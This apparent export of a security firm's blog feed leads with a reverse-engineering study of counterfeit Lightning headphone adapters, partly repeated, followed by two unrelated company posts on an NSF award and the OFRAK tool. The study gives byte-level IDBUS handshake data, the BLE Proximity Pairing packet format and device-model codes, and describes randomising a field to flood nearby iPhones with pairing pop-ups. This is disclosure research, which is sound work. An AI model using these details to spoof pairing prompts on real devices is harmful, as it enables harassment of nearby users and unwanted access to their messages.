In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device.)

 

The female Lightning port control chip is codenamed Hydra (this is a newer version that replaced the chip codenamed Tristar), and has the label CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are only available to MFi-certified manufacturers, but Apple only knows the internal behavior to prevent counterfeits. We will focus on the HiFive chip, since we found replica versions in our Baets adapters.

 

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol, where Apple’s specific implementation is referred to as IDBUS. Our research utilized the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiations include identifying information from the accessory and the Apple device. Still, every individual accessory contains unique information that makes it difficult to reverse engineer and counterfeit without being detected.

 

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.


In 2016,
electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic lightning cables.

 

Decapped third-party chip
http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html 

 

Authentic TI BQ2025 chip decapped
Credit:
9to5mac.com


Many chips advertise the ability to negotiate power through the Lightning port. Knockoff manufacturers continue to create many variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24..” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing  other variations of uncertified power negotiating chips include the
CY262, AD139, and ASB260, to name a few. It’s unknown if any of these chips or adapters come from the same manufacturers.

 

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

 

Removing the constant high signal from the data line does not affect the negotiation but is necessary for keeping power to the device when the screen is off. Setting the data line consistently high at 1.9V turns on the screen. Some of our adapters do not support sending over the data line in both orientations, so the Bluetooth module turns off when the Apple device stops supplying power when it turns its screen off.


Communication is half-duplex bidirectional, using the SDQ protocol. Like the
1-Wire protocol, the host and adapter communicate over the ACC_ID line only. The female Lightning port repeatedly sends requests for connected accessories to identify themselves. It alternates the pins of the request to determine the accessory orientation.

 

After receiving the request, the chip must first identify itself with the Hydra chip. In this proprietary protocol, if the first byte is even, it is a request, and the request ID + 1 is the response code. The initial request for identification has ID 0x74 and the response is Request ID + 1 (0x75). Not all the types of requests are known, but a list of known commands has been created by @spbdimka.

 

Incomplete List of IDBUS Request Types
https://twitter.com/spbdimka/status/1118597972760125440 

 

We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka, but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

After the 0x76 request receives a response, the ACC_PWR line goes high at either 3.3V or 4.1V. If output is 4.1V, then it will eventually correct down to 3.3V. 

This powers on the Bluetooth module, which will result in the pop-up window appearing on the device, prompting the user to connect. The ID of the adapter that is responding is 0x11F000000000. While it matches the same pattern of other accessories and cables, it does not match authentic Lightning to headphone jack adapters that have ID 0x04F100000000. The Baets adapters do not use the legitimate identifier, likely due to the fact that legitimate adapters directly convert audio signals and need more functionality than the knock-off versions, which only need to draw 3.3V from the accessory power line.

The Module and Accessory Serial Numbers are sent in plain ASCII format, but it is unknown if they correspond to the same accessory. The messages include additional information for an unknown purpose.

The last two commands are the Apple Device’s Model Number and Software Version in ASCII with the following format:

Changing the device and the iOS version we used to test resulted in different values for the Model Number and Software Version, as would be expected.

How does it activate the pop-up window?

Other research, including Handoff All Your Privacy and Discontinued Privacy, has highlighted Apple’s use of Bluetooth Low Energy (BLE) to enable Continuity features such as AirDrop, AirPrint, and Handoff. It is also used for Proximity Pairing with AirPods and other Bluetooth headphones made by Apple. We found that it was possible to duplicate the behavior to show the prompt on any nearby Apple devices. Pressing ‘Connect’ will pair with a Bluetooth device of our choosing while it’s posing as any model of Apple wireless headphones.

Pop-Up Window to connect AirPods


When Bluetooth is on, Apple devices send and receive BLE messages in the background.
New research from the Technical University of Darmstadt in Germany highlights that these BLE advertisements continue when iPhones are turned off. These messages are receivable by any nearby BLE devices, even if they are intended for communication with paired devices. iPhones and iPads are the most active, constantly advertising their status, including whether they are locked, unlocked, driving, playing music, watching a video, and making or receiving a call. Bluetooth headphones (e.g., AirPods, Beats) also advertise their status and battery level. Apple Watches use BLE to communicate their connectivity to a paired iPhone.

There is a lot of other data that Apple devices are freely advertising over the air using BLE. The BLE advertising packets are well documented and used by many popular devices and phones similar to the Apple Continuity protocols. Apple’s format is known from prior research:

Structure of a BLE advertisement packet 

Celosia, G., & Cunche, M. (2020)

The Manufacturer Specific Data includes the length of the data, the Apple company identifier (0x004C), and then the Continuity Message that is different for each respective Continuity protocol. We focused on the Continuity Message for the Proximity Pairing feature for this research. It has been previously documented as having only this format:


Proximity Pairing (AirPods)

Celosia, G., & Cunche, M. (2020)

 

However, when another device receives this advertisement from very close range, it recognizes that it is near someone else’s AirPods and alerts the user.


We found that an additional format is implemented for headphones ready to pair with a new device. The different setting is denoted by setting the third byte to 0x00. This format is shown below with an example of data we observed from the adapters:


Advertising data from Baets Adapter:


The Bluetooth Address specifies the address of any device to pair with using Bluetooth Classic. This does not have to be the adapter itself. Once paired, the adapter will stop broadcasting over BLE and maintain the Bluetooth Classic connection. The device model specifies which image and name appear on the connect screen. All the adapters we investigated used the device model 0x0520 to appear as BeatsX earphones. Other possible device models were checked using scripts modified from
Hexway’s Apple BLEEE project, resulting in the following, likely incomplete list:

We only tested these ranges of codes, so there are likely other possible values. Any unknown device model results in a screen prompting the device to check for a software update. There is an option to check for updates or setup. 




 “Set up with limited functionality.”
with unknown device model, where “RingRing” is a cell phone
(not headphones)

Changing the unknown field does affect whether the dialog will pop up at all, if it will pop up and disappear immediately, or if it stays on the screen as normal. In addition, some values will not result in a pop-up window appearing, depending on the device model advertised. The real purpose of this field is unknown and requires further testing.


Typically, if the pop-up window is closed, then another will not appear until the user turns their screen off and on again. However, if the unique tag field is changed randomly, the pop-up will occur about every 5 seconds after the user closes the previous window. This effectively prevents nearby users from using their devices because they must constantly close these windows. Other purposes for this field may exist but are not known at this time.

The Bluetooth modules found in the adapters implement the Proximity Pairing format for advertising through BLE. These modules are meant to replicate Apple’s W1 or H1 Bluetooth chip that is used in their Bluetooth headphones. The manufacturers of these counterfeit chips advertise the functionality for use in cheap Bluetooth headphones to make the pairing process more seamless. These chips can also use the Proximity Pairing packet format to advise the iPhone of the headphones’ battery level.

 

Promotional presentation/document for YC1168 Bluetooth chip
with pop-up window functionality.

Source: https://zhuanlan.zhihu.com/p/111406089 

 

As a result, these chips are becoming widely used in fake AirPods or Beats headphones, making it more difficult to identify counterfeits. In order to verify legitimate headphones, the user must either check the serial number directly with Apple or recognize the differences in quality, which may be difficult without prior experience. Our bodega Baets adapters came in boxes that looked nearly identical to the Apple version, but without the Apple logo.

Summary of Risks

The use of chips to negotiate drawing power from the device presents a number of risks. Allowing unlicensed devices to connect directly to the hardware presents some threats to Apple’s business model, but even more importantly to the consumer, as it may cause damage to the Apple device. There is no protection circuitry in the adapter that protects the Apple device if the adapter somehow sends too much voltage or current back through the Lightning port. We have observed quick battery drain, but these adapters may also damage the Apple device, which has been shown to happen when using unlicensed charging cables.

 

The ability to make a window pop-up on the device to connect to an unknown device is also a risk. Some Bluetooth devices, like the AirPods Pro, have the capability of using Siri and can then read and send messages, make and receive calls, read contacts, and have other functions that present a security risk. You would not want to let an arbitrary Bluetooth device belonging to someone else access your text messages.

 

Dialogue shown after connecting Bluetooth device disguised as AirPods Pro

 

The only way to turn off Proximity Pairing and prevent these dialogs is to turn off Bluetooth entirely. Once the dialog appears, the only way to close it is to press the small ‘X’ button. Clicking around the dialog does not get rid of the pop-up window. During testing, if the Apple device tries connecting to the Bluetooth address of headphones that are connected to another device, it will disconnect them. This makes it possible to create a string of events that would make an attack more likely to succeed. 

 

So, if you see an endless stream of random pairing requests on your Apple device, now you know your sole option:

Turn off Bluetooth and keep it off. 


– By Jared Gonzales and Joel Cretan

Want to learn how the hardware around you works? Come work with us! 


Shoutout to RBS alum Trey Keown for the title of this blog post.

To learn more about Red Balloon Security‘s offers, visit our Products page or contact us: [email protected]

Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega. 

 

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.

  

And here’s the short-take of our analysis: Beware the transposed vowels. “Baets” is not what it would want you to believe it is. 

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device, called “Baets.” We also noticed the phone’s battery draining much faster than usual.
 

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.

Table of Contents

MFi is MIA

The first thing we noted is none of these adapters has the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables; Apple licenses that chip to control who is allowed to produce Lightning devices.

 

Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. This module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio. 

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs costs $2 less than the genuine Apple version.

 

This initial finding fueled two research objectives:  To discover how the adapter convinced the Apple device to power the module; and to discover how the adapter displayed the pop-up window.

How does it receive power?

We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip. 

 

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.

 


First working counterfeit: Lightning to headphone jack



Second working counterfeit: Lightning to headphone jack



Third counterfeit: Lightning to  headphone jack (non-functional, not working)


 
Legitimate Apple adapter. Credit: iFixit


One side of the PCB is the Bluetooth chip and antenna on the active adapters. On the other side is a crystal oscillator clock, which connects to the Bluetooth chip. The chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The final chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module. 

 

Lightning Connector pinout according to patent filing:
https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html 

 

In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device).

 

The female Lightning port control chip is codenamed Hydra (this is a newer version that replaced the chip codenamed Tristar), and has the label CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are only available to MFi-certified manufacturers, but Apple only knows the internal behavior to prevent counterfeits. We will focus on the HiFive chip since we found replica versions in our Baets adapters.

 

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol, where Apple’s specific implementation is referred to as IDBUS. Our research utilized the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiations include identifying information from the accessory and the Apple device. Still, every individual accessory contains unique information that makes it difficult to reverse engineer and counterfeit without being detected.

 

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.


In 2016,
electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic lightning cables.

 

Decapped third-party chip
http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html 

 

Authentic TI BQ2025 chip decapped
Credit:
9to5mac.com


Many chips advertise the ability to negotiate power through the Lightning port. Knockoff manufacturers continue to create many variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24.” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing variations of uncertified power negotiating chips include the
CY262, AD139, and ASB260, to name a few. It’s unknown if any of these chips or adapters come from the same manufacturers.

 

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

 

Removing the constant high signal from the data line does not affect the negotiation but is necessary for keeping power to the device when the screen is off. Setting the data line consistently high at 1.9V turns on the screen. Some of our adapters do not support sending over the data line in both orientations, so the Bluetooth module turns off when the Apple device stops supplying power when it turns its screen off.


Communication is half-duplex bidirectional, using the SDQ protocol. Like the
1-Wire protocol, the host and adapter communicate over the ACC_ID line only. The female Lightning port repeatedly sends requests for connected accessories to identify themselves. It alternates the pins of the request to determine the accessory orientation.

After receiving the request, the chip must first identify itself with the Hydra chip. In this proprietary protocol, if the first byte is even, it is a request, and the request ID + 1 is the response code. The initial request for identification has ID 0x74 and the response is Request ID + 1 (0x75). Not all the types of requests are known, but a list of known commands has been created by @spbdimka.

 

Incomplete List of IDBUS Request Types
https://twitter.com/spbdimka/status/1118597972760125440 

 

We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

Request/Response TypeRequest/
Response Code
DataCRC8
Get ID7400 021F
Parse Get ID7511 F0 00 00 00 00D6
Get Module State72 71
Parse Module State7380 00 C0 0087
Get Module State7080 0012
Parse Module State71 93
Get Interface Info76 10
Get Interface Info76 10
Parse Interface Info7701 25 01 80 A0 6A 8D 25 26 662E
Get Module Serial78 0F
Parse Module Serial7944 57 48 32 33 38 37 34 57 32 44 46 35 4C 34 41 39 00 BB 880E
Get Accessory Serial7A B3
Parse Accessory Serial7B43 30 38 32 34 32 36 30 4B 37 4C 44 59 37 51 41 51 00 30 00CC
Extract System Info8400 00 05 4D 51 44 54 32FD
Extract System Info8401 00 06 31 39 45 32 35 3849

After the 0x76 request receives a response, the ACC_PWR line goes high at either 3.3V or 4.1V. If output is 4.1V, then it will eventually correct down to 3.3V. 

This powers on the Bluetooth module, which will result in the pop-up window appearing on the device, prompting the user to connect. The ID of the adapter that is responding is 0x11F000000000. While it matches the same pattern of other accessories and cables, it does not match authentic Lightning to headphone jack adapters that have ID 0x04F100000000. The Baets adapters do not use the legitimate identifier, likely due to the fact that legitimate adapters directly convert audio signals and need more functionality than the knock-off versions, which only need to draw 3.3V from the accessory power line.

The Module and Accessory Serial Numbers are sent in plain ASCII format, but it is unknown if they correspond to the same accessory. The messages include additional information for an unknown purpose.

 

Command

Value

ASCII Representation

Unknown

CRC8

79

44 57 48 32 33 38 37 34 57 32 44 46 35 4C 34 41 39

DWH23874W2DF5L4A9

00 BB 88

0E

7B

43 30 38 32 34 32 36 30 4B 37 4C 44 59 37 51 41 51

C0824260K7LDY7QAQ

00 30 00

CC

 

The last two commands are the Apple Device’s Model Number and Software Version in ASCII with the following format:

 

Command

Model/Software Version

Unknown

Value

ASCII Representation

CRC8

84

00 (Model Number)

00 05

4D 51 44 54 32

MQDT2 (iPad)

FD

84

01 (Software Version)

00 06

31 39 45 32 35 38

19E258 (iOS 15.4.1)

49

 

Changing the device and the iOS version we used to test resulted in different values for the Model Number and Software Version, as would be expected.

How does it activate the pop-up window?

Other research, including Handoff All Your Privacy and Discontinued Privacy, has highlighted Apple’s use of Bluetooth Low Energy (BLE)  to enable Continuity features such as AirDrop, AirPrint, and Handoff. It is also used for Proximity Pairing with AirPods and other Bluetooth headphones made by Apple. We found that it was possible to duplicate the behavior to show the prompt on any nearby Apple devices. Pressing ‘Connect’ will pair with a Bluetooth device of our choosing while it’s posing as any model of Apple wireless headphones.

 

Pop-Up Window to connect AirPods


When Bluetooth is on, Apple devices send and receive BLE messages in the background.
New research from the Technical University of Darmstadt in Germany highlights that these BLE advertisements continue when iPhones are turned off. These messages are receivable by any nearby BLE devices, even if they are intended for communication with paired devices. iPhones and iPads are the most active, constantly advertising their status, including whether they are locked, unlocked, driving, playing music, watching a video, and making or receiving a call. Bluetooth headphones (e.g., AirPods, Beats) also advertise their status and battery level. Apple Watches use BLE to communicate connectivity to a paired iPhone.

 

There is a lot of other data that Apple devices are freely advertising over the air using BLE. The BLE advertising packets are well documented and used by many popular devices and phones similar to the Apple Continuity protocols. Apple’s format is known from prior research:

 

Structure of a BLE advertisement packet 

Celosia, G., & Cunche, M. (2020)

 

The Manufacturer Specific Data includes the length of the data, the Apple company identifier (0x004C), and then the Continuity Message that is different for each respective Continuity protocol. We focused on the Continuity Message for the Proximity Pairing feature for this research. It has been previously documented as having only this format:


Proximity Pairing (AirPods)

Celosia, G., & Cunche, M. (2020)

 

However, when another device receives this advertisement from very close range, it recognizes that it is near someone else’s AirPods and alerts the user.

 


We found that an additional format is implemented for headphones ready to pair with a new device. The different setting is denoted by setting the third byte to 0x00. This format is shown below with an example of data we observed from the adapters:

 

0x07

Length

0x00 (Pairing Mode)

Device Model

Bluetooth Address

Unknown

1 Byte

1 Byte

1 Byte

2 Bytes

6 Bytes

1 Byte

Right Battery

Left Battery

Case Battery

Unique Tag

Color

1 Byte

1 Byte

1 Byte

1 Byte

1 Byte


Advertising data from Baets Adapter:

 

0x07

0x0F

0x00

0x0520

0x414209D43151

0x95

Proximity Pairing

Length

Pairing Mode

Device Model

(BeatsX)

Bluetooth Address

(41:42:09:D4:31:51)

Unknown

0x64

0x64

0x64

0x02

0x00

Right Battery (100%)

Left Battery

(100%)

Case Battery

(100%)

Unique Tag

Color

(White)


The Bluetooth Address specifies the address of any device to pair with using Bluetooth Classic. This does not have to be the adapter itself. Once paired, the adapter will stop broadcasting over BLE and maintain the Bluetooth Classic connection. The device model specifies which image and name appear on the connect screen. All the adapters we investigated used the device model 0x0520 to appear as BeatsX earphones. Other possible device models were checked using scripts modified from
Hexway’s Apple BLEEE project, resulting in the following, likely incomplete list:

 

Hex Value

Device Model

0220

Airpods

0320

PowerBeats3

0520

BeatsX

0620

Beats Solo3

0920

Beats Studio3

0A20

Airpods Max

0B20

Powerbeats Pro

0C20

Beats Solo Pro

0D20

Powerbeats

0E20

Airpods Pro

0F20

Airpods

1020

Beats Flex

1120

Beats Studio Buds


We only tested these ranges of codes, so there are likely other possible values. Any unknown device model results in a screen prompting the device to check for a software update. There is an option to check for updates or setup.

 



 “Set up with limited functionality.”
with unknown device model, where “RingRing” is a cell phone
(not headphones)

 

Changing the unknown field does affect whether the dialog will pop up at all, if it will pop up and disappear immediately, or if it stays on the screen as normal. In addition, some values will not result in a pop-up window appearing, depending on the device model advertised. The real purpose of this field is unknown and requires further testing.


Typically, if the pop-up window is closed, then another will not appear until the user turns their screen off and on again. However, if the unique tag field is changed randomly, the pop-up will occur about every 5 seconds after the user closes the previous window. This effectively prevents nearby users from using their devices because they must constantly close these windows. Other purposes for this field may exist but are not known at this time.

The Bluetooth modules found in the adapters implement the Proximity Pairing format for advertising through BLE. These modules are meant to replicate Apple’s W1 or H1 Bluetooth chip that is used in their Bluetooth headphones. The manufacturers of these counterfeit chips advertise the functionality for use in cheap Bluetooth headphones to make the pairing process more seamless. These chips can also use the Proximity Pairing packet format to advise the iPhone of the headphones’ battery level.

Promotional presentation/document for YC1168 Bluetooth chip
with pop-up window functionality.

Source: https://zhuanlan.zhihu.com/p/111406089 

 

As a result, these chips are becoming widely used in fake AirPods or Beats headphones, making it more difficult to identify counterfeits. In order to verify legitimate headphones, the user must either check the serial number directly with Apple or recognize the differences in quality, which may be difficult without prior experience. Our bodega Baets adapters came in boxes that looked nearly identical to the Apple version, but without the Apple logo.

Summary of Risks

The use of chips to negotiate drawing power from the device presents a number of risks. Allowing unlicensed devices to connect directly to the hardware presents some threats to Apple’s business model, but even more importantly to the consumer, as it may cause damage to the Apple device. There is no protection circuitry in the adapter that protects the Apple device if the adapter somehow sends too much voltage or current back through the Lightning port. We have observed quick battery drain, but these adapters may also damage the Apple device, which has been shown to happen when using unlicensed charging cables.

 

The ability to make a window pop-up on the device to connect to an unknown device is also a risk. Some Bluetooth devices, like the AirPods Pro, have the capability of using Siri and can then read and send messages, make and receive calls, read contacts, and have other functions that present a security risk. You would not want to let an arbitrary Bluetooth device belonging to someone else access your text messages.

 

Dialogue shown after connecting Bluetooth device disguised as AirPods Pro

 

The only way to turn off Proximity Pairing and prevent these dialogs is to turn off Bluetooth entirely. Once the dialog appears, the only way to close it is to press the small ‘X’ button. Clicking around the dialog does not get rid of the pop-up window. During testing, if the Apple device tries connecting to the Bluetooth address of headphones that are connected to another device, it will disconnect them. This makes it possible to create a string of events that would make an attack more likely to succeed. 

 

So, if you see an endless stream of random pairing requests on your Apple device, now you know your sole option:

 

Turn off Bluetooth and keep it off. 


– By Jared Gonzales and Joel Cretan

Want to learn how the hardware around you works? Come work with us! 


Shoutout to RBS alum Trey Keown for the title of this blog post.

To learn more about Red Balloon Security‘s offers, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/baets/feed/ 0 7712
Red Balloon Security Wins 2022 NSF Convergence Accelerator Award for Proposed Improvements to 5G Cybersecurity Through Hardening of Embedded Devices https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/ https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/#respond Thu, 08 Sep 2022 04:17:12 +0000 https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/

Red Balloon Security Wins 2022 NSF Convergence Accelerator Award for Proposed Improvements to 5G Cybersecurity Through Hardening of Embedded Devices

Red Balloon Security Wins 2022 NSF Convergence Accelerator Award for Proposed Improvements to 5G Cybersecurity Through Hardening of Embedded Devices

We’re one of 16 teams chosen to enhance the secure operation of 5G infrastructure.

Red Balloon Security has received a $682,000 award from the National Science Foundation’s Convergence Accelerator Program, which includes participation in Phase 1 of the program’s Track G: Securely Operating Through 5G Infrastructure. The Department of Defense is aligned with the NSF Convergence Accelerator through this 5G initiative, “Operate Through,” and is a funding partner of this track topic.

 

 

RBS’s Phase I project, Building Resilient and Secure 5G Systems (BRASS), will leverage a use-inspired convergence research approach to ensure 5G devices are outfitted with detection and prevention capabilities that are effective against large classes of firmware vulnerabilities and cyberattacks, including attacks that exploit zero-day vulnerabilities. The company’s automated firmware hardening and runtime protection embedded solutions will help 5G infrastructure and mobile device managers secure devices in the context of cooperative, non-cooperative, and tailored 5G networks.

 

“Low-level firmware of 5G devices needs protection against increasing threats,” says Dr. Aleksey Nogin, Head of Research at Red Balloon, and BRASS’s Co-PI and PM. “Most contain a number of different processors, each running complex and potentially vulnerable firmware. BRASS will expand on our methods to automate and accelerate the integration of passive and active firmware protections for 5G devices in critical and vulnerable environments.”

 

5G infrastructure involves multiple, novel technologies and interfaces that increase its complexity in relation to existing 4G networks, and amplify potential security issues. Red Balloon’s host-based firmware detection and attack prevention technology can provide a robust layer of security in networks that are still evolving, or where securitization capabilities are not a primary consideration.

 

The National Science Foundation (NSF) is building upon research and discovery to accelerate use-inspired research into practice. The Convergence Accelerator program is an NSF capability designed to address national-scale societal challenges. Its 2022 cohort on Track G, Phase 1, will undertake a nine-month planning effort to develop initial concepts, identify new team members, participate in the innovation curriculum, and develop an initial prototype.

 

At the end of Phase 1, each team will participate in a formal pitch and proposal evaluation. Selected teams from Phase 1 will proceed to Phase 2, with potential funding of up to $5 million for 24 months.

 

“The Convergence Accelerator is a relatively young NSF program, but our unique program model is focused on delivering tangible solutions that have a positive impact to our nation and the American people,” said Douglas Maughan, Head of the NSF Convergence Accelerator program. “We are excited to be partnering with the Department of Defense’s Office of the Under Secretary of Defense for Research and Engineering to accelerate solutions to support DoD’s 5G mission.”

 

Aleksey Nogin feels RBS can deliver solutions with nation-wide implications. “The combination of deep research capabilities and a track record of commercial applications for our core technology, Symbiote, puts us in a unique position. We have a great deal of experience working with government agencies that depend on reliable, cutting-edge solutions, as well as a method for scaling our technology to meet the needs of the marketplace.”

About Track G: Securely Operating Through 5G Infrastructure

The Convergence Accelerator’s Track G consists of three sub-focuses that are distinguished by the degree of cooperation expected from the indigenous 5G network:

Non-Cooperative Networks:

Assumes no cooperation from the indigenous 5G network. This sub-track seeks capabilities where end devices can operate on untrusted 5G infrastructure found in the field, and seamlessly connect with devices on external networks while leveraging zero-trust principles.

Cooperative Networks:

Assumes the indigenous 5G network will work with the military, government, or critical infrastructure operator, but any cooperation must be operationally reasonable and beneficial to the indigenous network.

Tailored Networks:

Tailors the 5G network to meet the military, government, or critical infrastructure operator’s requirements. This sub-track seeks solutions to operate through 5G networks with custom and specifically designed implementations.

To learn more about Red Balloon Security‘s offers, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/feed/ 0 7597
OFRAK: A BOON TO THE CYBER SECURITY COMMUNITY, EMBEDDED DEVICE MANUFACTURERS, AND END USERS, IN 7 QUESTIONS https://redballoonsecurity.com/ofrak-a-boon-to-the-security/ https://redballoonsecurity.com/ofrak-a-boon-to-the-security/#respond Wed, 31 Aug 2022 22:01:07 +0000 https://redballoonsecurity.com/?p=7465

OFRAK: A BOON TO THE CYBER SECURITY COMMUNITY, EMBEDDED DEVICE MANUFACTURERS, AND END USERS, IN 7 QUESTIONS

OFRAK: A BOON TO THE CYBER SECURITY COMMUNITY, EMBEDDED DEVICE MANUFACTURERS, AND END USERS, IN 7 QUESTIONS

The release of RBS’s firmware reverse engineering tool is consistent with government and industry calls for higher security standards.

For over a decade, Red Balloon Security has used FRAK – the Firmware Reverse Analysis Konsole – in deployments with the US government, commercial engagements with original equipment manufacturers (OEMs), and to conduct independent research on device firmware. It has proven to be a multi-faceted tool that RBS engineers rely on to make sense of, harden, and repack firmware binaries that are essential to the operation of all types of embedded devices, including  satellite control terminals, PLCs,  automotive ECUs,  building control and safety equipment, and ordinary commercial products, such as drones or monitors.

 

But from its inception, FRAK was meant to be a tool for the security community at large.

 

RBS CEO and founder, Dr. Ang Cui, originally created FRAK in 2012. “At the time, I thought, here’s a framework that would help researchers move embedded security forward,” Dr. Ang Cui explained recently. “I thought the security community and engineers with all the leading device manufacturers should have it at their disposal.”

 

In August 2022, after many refinements, many of which we honed through engagements with DARPA, DHA, and DoD, Red Balloon made FRAK – OFRAK, in its current interaction – available to the greater security community.

 

Red Balloon is dedicated to making firmware easier to understand, easier to improve and easier to secure. We encourage engineers and other technical people to visit https://ofrak.com for a deeper understanding of OFRAK’s functionality and licensing options.

 

Here are seven answers to more general questions about what OFRAK is, what it does, and why Red Balloon is so excited about this release.

1. What, exactly, can engineers do with OFRAK?

OFRAK is a binary analysis and modification platform that combines the ability to:

 

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

 

OFRAK supports a range of embedded firmware file formats beyond user-space executables, including:

 

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

 

Red Balloon frequently uses OFRAK for firmware unpacking, analysis, modification, and repacking, and maintains it with those purposes in mind.

 

Both engineers working for device manufacturers and security researchers tasked with discovering or remediating device vulnerabilities can use OFRAK to both analyze how a device’s firmware operates and modify it.

“ [OFRAK] is a valuable tool that significantly facilitated security researchers’ work in the field of applied embedded security. I am very happy to see more of this project being made available to such a wide audience through open source.”

“ [OFRAK] is a valuable tool that significantly facilitated security researchers’ work in the field of applied embedded security. I am very happy to see more of this project being made available to such a wide audience through open source.”

2. How does OFRAK actually benefit software engineers, and those training to enter the field?

Essentially, OFRAK allows software engineers to do their work with greater speed and efficiency, freeing them up to tackle harder engineering problems.

 

For less-experienced users, OFRAK is an excellent platform for learning about binaries and embedded firmware in general.

 

RBS uses OFRAK to unpack firmware and inject its firmware hardening and runtime protection solutions, such as Symbiote. 

3. Is OFRAK the only publicly available tool that does this?

No. Many firmware unpacking and analysis tools already exist.  One of the most popular publicly-available tools, Ghidra, was developed and released by the NSA in 2019.

4. How is OFRAK different from other software engineering platforms?

Most binary analysis tools work best when analyzing common executable file formats or binary blobs, but struggle with common firmware formats or navigating nested firmware files. OFRAK’s first-class support for embedded firmware allows a user to unpack and analyze an ELF buried within an XZ-compressed CPIO file system inside of an ISO, modify the ELF, and then repack the entire tree. 

 

